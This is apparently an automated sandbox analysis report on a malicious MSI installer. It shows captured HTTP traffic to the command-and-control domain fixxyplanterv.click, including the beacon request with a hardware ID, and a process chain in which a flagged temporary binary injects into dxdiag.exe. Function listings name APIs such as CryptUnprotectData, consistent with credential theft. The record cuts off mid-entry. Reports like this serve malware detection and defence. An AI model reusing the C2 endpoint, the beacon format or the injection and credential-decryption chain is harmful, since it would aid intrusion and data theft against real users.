2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: a2 97 c7 06 94 c6 fa 1f 9c 74 74 81 17 9d 55 22 a7 1a 29 e6 2e c5 ea ae d1 ea c3 ad 5b 2f 78 41 e3 aa 96 bd db e5 22 f7 be 27 32 d2 ad 2c 1e 44 8c 56 dd df 1f b9 92 47 b8 d3 b7 b1 a7 36 a8 da 66 0f a6 5f dd 1e 4f 4a 64 e3 6b cc 19 44 2e 09 26 e7 41 e2 c7 94 55 4a f6 69 a4 aa e5 34 59 8a 89 88 2c ed da d6 e8 b4 43 2d 5a 5b be 75 89 aa d5 a8 92 90 d4 6c 45 ae a1 b0 c8 f2 f4 51 71 4a 10 5a 28 69 c4 c7 95 ca 45 45 26 70 ab be 3b e2 0f 7a 89 6e e3 09 69 4c da f6 1c 96 7e da 4d fb 44 e5 9f 6b c9 07 e0 50 51 9e ac f4 9c d2 c8 82 5b 68 44 07 1a 5e ea fe 4f e9 19 83 2d ba cc cf 7b 6f 8c e8 82 54 25 82 d1 ff db 00 b6 6e cd ea 95 03 ed 0f 2a 4f fc 73 49 45 72 93 e6 0b 5b d4 3b 21 c3 eb 97 54 75 31 cc 62 2b ba 16 1b b0 58 59 37 df 63 43 a8 83 1b 04 dc a2 a1 18 1c 4a Data Ascii: ttU").[/xA"'2,DVG6f_OJdkD.&AUJi4Y,C-Z[ulEQqJZ(iEE&p;zniL~MDkPQ[hD^O-{oT%n*OsIEr[;!Tu1b+XY7cCJ
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: f6 bb 4a dc aa 4c e9 1d c9 4a 47 c3 a8 70 d4 b5 68 ba 2c 37 30 4d 58 87 a3 bf 7d cd fe 56 46 0f 04 67 c2 79 83 4c d1 24 fd 46 e8 99 75 cb 4c 6b 35 b6 5f 3d 09 4f 2d dc f4 4b 65 df b2 23 b0 c6 6f 49 ec 52 95 a5 b0 5b df 63 d9 d8 5b 6a 01 36 70 04 2a 12 05 2b 7f d9 94 73 9c 74 41 2d cc 61 e0 67 ea 7c 62 df f7 0c 2f 68 c0 e8 86 f5 06 c2 09 d0 f0 10 de b7 eb ea dd dc da f5 60 f6 5f 9b 1a 3e 19 e9 6b 64 a6 49 d8 36 38 9a b2 eb bf 29 f7 55 3b 87 dd 05 f6 cf 75 c9 91 96 dd 88 d4 5f f3 b0 04 a2 f3 78 4b 5c 68 8d 65 be 8b 13 0e 1a 76 c6 92 dc 18 70 f8 9e 83 8d 8b 22 1d fd 5f 5f 2a a5 70 b5 f1 6f 76 50 d3 94 52 fe b5 da 36 50 19 c8 1f 33 cf 74 0b ef f3 41 b6 d4 96 a1 b1 7d ff 50 b3 f6 c7 fe 24 35 86 ac a4 47 24 d2 5a f7 87 05 ec 70 87 29 2a 32 2f 5c ec d5 c2 03 27 Data Ascii: JLJGph,70MX}VFgyL$FuLk5_=O-Ke#oIR[c[j6p+stA-ag\|b/h`_>kdI68)U;u_xK\hevp"__povPR6P3tA}P$5G$Zp)*2/\'
2025-01-13 07:29:21 UTC	1139	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rm674buc3juhfjn7ldhpkkcku7; expires=Fri, 09 May 2025 01:15:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCdJtxBAGg%2BTlBbWLekobx5%2BLU4lS1gp0NDZAs500dZ3HUK7gRY9XHzCfrxdoq4MQRm%2Fa%2F3z0rd1nDiLKmuXfKZWPNoixa2q8kzP%2FnTDfywq15kJwSABCO%2FCZEh88rZClgVHnwon"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013acb1dea84258-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2423&min_rtt=2419&rtt_var=917&sent=323&recv=568&lost=0&retrans=0&sent_bytes=2848&recv_bytes=554616&delivery_rate=1187957&cwnd=181&unsent_bytes=0&cid=0eb8f5271599b2ad&ts=1505&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49781	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:21 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: fixxyplanterv.click
2025-01-13 07:29:21 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d 26 68 77 69 64 3d 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 Data Ascii: act=get_message&ver=4.0&lid=ZqchOa--new&j=&hwid=976E25EBFC839FDD5EC6468C5C963249
2025-01-13 07:29:21 UTC	1121	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0re3tbgc1q4l80n3dm1bi9i0gk; expires=Fri, 09 May 2025 01:16:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=szJZoLIkzljmGlMJ3WyDWEjdeOOhgcCGF63dQp5Evqd2Gim3levZJvWaAsmyNcryUZ703IbkDdPJKkL5l3561MYcsjexyJ5QHIgOhMNKjImNk6LWUevbNud7kDlNgor%2FI9KyGF6S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013acbe8b9480cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1607&rtt_var=621&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=983&delivery_rate=1734997&cwnd=178&unsent_bytes=0&cid=3db81c2d150388b8&ts=338&x=0"
2025-01-13 07:29:21 UTC	54	IN	Data Raw: 33 30 0d 0a 69 46 45 4d 58 36 49 37 69 4d 62 47 2f 7a 4b 2f 63 39 68 6e 53 4b 5a 6a 69 36 36 73 55 30 67 70 48 47 4b 31 4a 50 43 50 54 46 62 54 44 41 3d 3d 0d 0a Data Ascii: 30iFEMX6I7iMbG/zK/c9hnSKZji66sU0gpHGK1JPCPTFbTDA==
2025-01-13 07:29:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:29:06
Start date:	13/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\msit.msi"
Imagebase:	0x7ff7b21b0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:29:06
Start date:	13/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7b21b0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:29:07
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DE
Imagebase:	0xaa0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:29:08
Start date:	13/01/2025
Path:	C:\Windows\Installer\MSIAEB.tmp
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Installer\MSIAEB.tmp"
Imagebase:	0x7ff78e210000
File size:	13'084'160 bytes
MD5 hash:	4D82074854750FDBA89D76624CC1E6F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:29:09
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0x7ff66e660000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:29:09
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0x5a0000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FF78E2E5D6C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF78E2E5D98
GetCurrentThreadId.KERNEL32 ref: 00007FF78E2E5DA6
GetCurrentProcessId.KERNEL32 ref: 00007FF78E2E5DB2
QueryPerformanceCounter.KERNEL32 ref: 00007FF78E2E5DC2

Memory Dump Source

Source File: 00000004.00000002.2194130959.00007FF78E211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78E210000, based on PE: true

Associated: 00000004.00000002.2194112360.00007FF78E210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2194396747.00007FF78E2FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2195787706.00007FF78ECFC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2195898065.00007FF78EE3C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2195919962.00007FF78EE41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2195939206.00007FF78EE47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78e210000_MSIAEB.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
Instruction ID: 041a8065bc1fbbc0b11d9a697b117d09562be7c1c5bd7c8bf2b7ff173bd91f7f
Opcode Fuzzy Hash: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
Instruction Fuzzy Hash: C9111C32B14F028AEB009BA0E8542B873B4FB59B58F940E31EE6D467A4DFB8D165C750

Analysis Process: dxdiag.exePID: 1708, Parent PID: 2248COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	68.9%
Total number of Nodes:	296
Total number of Limit Nodes:	24

Executed Functions

Function 00435870 Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 661
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435B0F
SysAllocString.OLEAUT32(0000D588), ref: 00435B91
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435BCF
SysAllocString.OLEAUT32(s%w'), ref: 00435C56
SysAllocString.OLEAUT32(s%w'), ref: 00435CF1
VariantInit.OLEAUT32(83828188), ref: 00435D64

Strings

/#$%, xrefs: 00435919, 004359B5
PQ, xrefs: 00435D9E
s%w', xrefs: 00435C51, 00435C55, 00435CF0, 00435DCF
d)*+, xrefs: 00435BE8

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: /#$%$PQ$d)*+$s%w'
API String ID: 65563702-3008678497
Opcode ID: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
Instruction ID: 5414f25a513856cf292a94d973b8fe981ab4f01926d2cca0fa1231f3848f9231
Opcode Fuzzy Hash: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
Instruction Fuzzy Hash: 50220E71A087009BD710DF29C881B6BBBE5EFC9710F14892EF4959B391D738D90ACB86

Function 0040E458 Relevance: 14.2, APIs: 2, Strings: 7, Instructions: 651
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040E45F
CoUninitialize.COMBASE ref: 0040E7DC

Strings

vol,, xrefs: 0040E8C1
yp, xrefs: 0040EA76
fixxyplanterv.click, xrefs: 0040E7C5, 0040EB48
2t, xrefs: 0040EA7D
qy, xrefs: 0040EA84
[^Q$, xrefs: 0040E8CF
Qv, xrefs: 0040EA6F

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: Uninitialize
String ID: 2t$Qv$[^Q$$fixxyplanterv.click$qy$vol,$yp
API String ID: 3861434553-2046213541
Opcode ID: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
Instruction ID: 4db51f1f72c5905ee0b1b22d732d3a9d787199a41c6fab9545acfa54408a17bb
Opcode Fuzzy Hash: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
Instruction Fuzzy Hash: E9120CB56047818FD325CF36C590622BFA2FF96304B1989ADC4D25FB92C739B816CB94

Function 0040CDD7 Relevance: 10.3, Strings: 8, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

976E25EBFC839FDD5EC6468C5C963249, xrefs: 0040CE31
9n`, xrefs: 0040CFC9
RT, xrefs: 0040D024
fixxyplanterv.click, xrefs: 0040D0F2
AVUF, xrefs: 0040CEC9
Z&\, xrefs: 0040D016
nx}v, xrefs: 0040CEBB
VD}N, xrefs: 0040CEC2

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 976E25EBFC839FDD5EC6468C5C963249$9n`$AVUF$VD}N$fixxyplanterv.click$nx}v$RT$Z&\
API String ID: 0-4289302229
Opcode ID: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
Instruction ID: d82674ca07e07c92295c7b8026b48e690f7d2c28deac3183c156c38ed5531bfa
Opcode Fuzzy Hash: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
Instruction Fuzzy Hash: 359136B0204B82DFD315CF2AC490262FFA2FF56304B28866DC4965BB95C779B816CF94

Function 004227B0 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 529
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4)B, xrefs: 00422D2B, 00422E03
&*Jk, xrefs: 00422827
=>, xrefs: 0042281C
|~, xrefs: 00422A9E

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: &*Jk$4)B$=>$|~
API String ID: 0-1009457168
Opcode ID: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
Instruction ID: 152786c77f951dd3dbca6d6113f2fe09001a096b4f0132f05b015a8fe36a5df1
Opcode Fuzzy Hash: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
Instruction Fuzzy Hash: 74F164B4A00215DFCB10CF68D9826ABBBB1FF85310F18826DD845AF355D378E942CB99

Function 00420B10 Relevance: 8.0, Strings: 6, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 00420D0C
!@, xrefs: 00420B43
b, xrefs: 004210FD
], xrefs: 00420D11
^, xrefs: 00420D16
,, xrefs: 00421059

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$\$]$^$b
API String ID: 1279760036-3534480190
Opcode ID: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
Instruction ID: ebca42ed76a8c9da250c5dc1f0308dd38997bd67e4ab243a484973a2be5f2ac8
Opcode Fuzzy Hash: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
Instruction Fuzzy Hash: 7F22AE7160C3A08FD324CF28944036FBBE1AB96324F594A6EE5E5873D2D7798845CB4B

Function 00408920 Relevance: 6.1, APIs: 4, Instructions: 116
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408941
GetCurrentThreadId.KERNEL32 ref: 0040894B
GetForegroundWindow.USER32 ref: 00408A05
ExitProcess.KERNEL32 ref: 00408A85

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID:
API String ID: 3118123366-0
Opcode ID: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
Instruction ID: 0d30fea2273658e8f12e1d2f8b086a2a35bf40361b224995e2d0f0fc3bd077a4
Opcode Fuzzy Hash: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
Instruction Fuzzy Hash: E6313833A043144FD308EF799D8621AF6D6ABC8350F06953EF8C8DB391DA749C05868A

Function 0040AAE0 Relevance: 5.4, Strings: 4, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+, xrefs: 0040AAFE
KRST, xrefs: 0040AC4B
/8=+, xrefs: 0040AD45, 0040AF08, 0040AF3D, 0040AF11
/8=+, xrefs: 0040AD9F

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: +$/8=+$/8=+$KRST
API String ID: 0-1235365206
Opcode ID: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
Instruction ID: 157f1745fbdc77b4c2282c5122e8992570511c6dc21cebd8a3ce22f79508730e
Opcode Fuzzy Hash: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
Instruction Fuzzy Hash: AEC1277264C3504BD314CF6584516ABFBE3AFD1304F18883DE4E5AB381D639891AC797

Function 00431262 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004312B0
GetSystemMetrics.USER32 ref: 004312BF

Strings

, xrefs: 00431393

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
Instruction ID: bf2bc5d8e4d95e73b8fdb797fadfe66e5eac667f6d15a87326ad77e9f8a434e9
Opcode Fuzzy Hash: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
Instruction Fuzzy Hash: 665182B0D142099FDB40EFACD985A9EBBF0BB88310F114569E499E7350D734AD48CF96

Function 00415971 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 457
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415C24

Strings

Q, xrefs: 00415AF1

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: Q
API String ID: 834300711-3463352047
Opcode ID: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
Instruction ID: 334bc079e22fc92185ed06b095f9784487d9b1feb53ebf903c8272a05930d261
Opcode Fuzzy Hash: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
Instruction Fuzzy Hash: 0BE1F3B55483818FD720CF24C8917EFBBA2EFD5314F04493DE4898B252EB389985CB4A

Function 00425480 Relevance: 2.8, Strings: 2, Instructions: 315COMMON

Download Yara Rule

Strings

}ji~, xrefs: 0042574C
&#$, xrefs: 00425520

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: &#$$}ji~
API String ID: 2994545307-3214320781
Opcode ID: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
Instruction ID: 7a21dba1f6b4e75eed38616ab3744ad9dd1eab9b40c1e5948c0a189561833efb
Opcode Fuzzy Hash: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
Instruction Fuzzy Hash: C3914B76B047105BD7149E24ECC2B7B73A2EBC1318F98843EE94687396E67C9C05D399

Function 00439E40 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00438640 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

/J x, xrefs: 004386CF

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: /J x
API String ID: 2994545307-1866642894
Opcode ID: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
Instruction ID: 874112095a5efa33bfbcb898a975de2e52caa01511d8d9f4d2bd4c75d1d74cee
Opcode Fuzzy Hash: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
Instruction Fuzzy Hash: 55518A71A043008FE724EE299C8166BF7A2EBC9714F299A3EE58457381DE389C018799

Function 0043C8F0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

@, xrefs: 0043C959

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
Instruction ID: a35a6d60c968e134acf55cef92dc51cc7359e84a70f9638e84e2e7fd5f809bf1
Opcode Fuzzy Hash: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
Instruction Fuzzy Hash: D53102B15083048BD314EF14C8C16AFF7F5EF9A320F15A92EE99557390D3799848CB9A

Function 0043D400 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
Instruction ID: 9a74d657e93f8d3f5cf240051ad191b629485e22a32f0a110a3d4ded04f7e6bd
Opcode Fuzzy Hash: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
Instruction Fuzzy Hash: 4FA12532A083114BD314CE28D89156BBBE2EBDA314F29EA3EE9A597351D738DC05C785

Function 0043CA10 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
Instruction ID: 1330599076484d40c3e41ed8303109be540c1e7eaad1d2ba3b2e5e3a43da2089
Opcode Fuzzy Hash: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
Instruction Fuzzy Hash: E07133316043018BD714EF28D8D1A7FB7E2EB89310F19E53EE8899B391DB389C409789

Function 00435530 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
Instruction ID: 058e7eb1b77869290f7d29a5434ce18bf9e6f536ede9c38a5ab45312e861f76d
Opcode Fuzzy Hash: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
Instruction Fuzzy Hash: 79A1073250C7818FD3149B38885126FBBD25BCA324F194B6EE5EA473D1D678C941C74B

Function 0043A7F4 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
Instruction ID: 862a6d1eb3e04205f618e8bd76b9e7ff9fb97f5fdbb19bdb3795918c96e67ed1
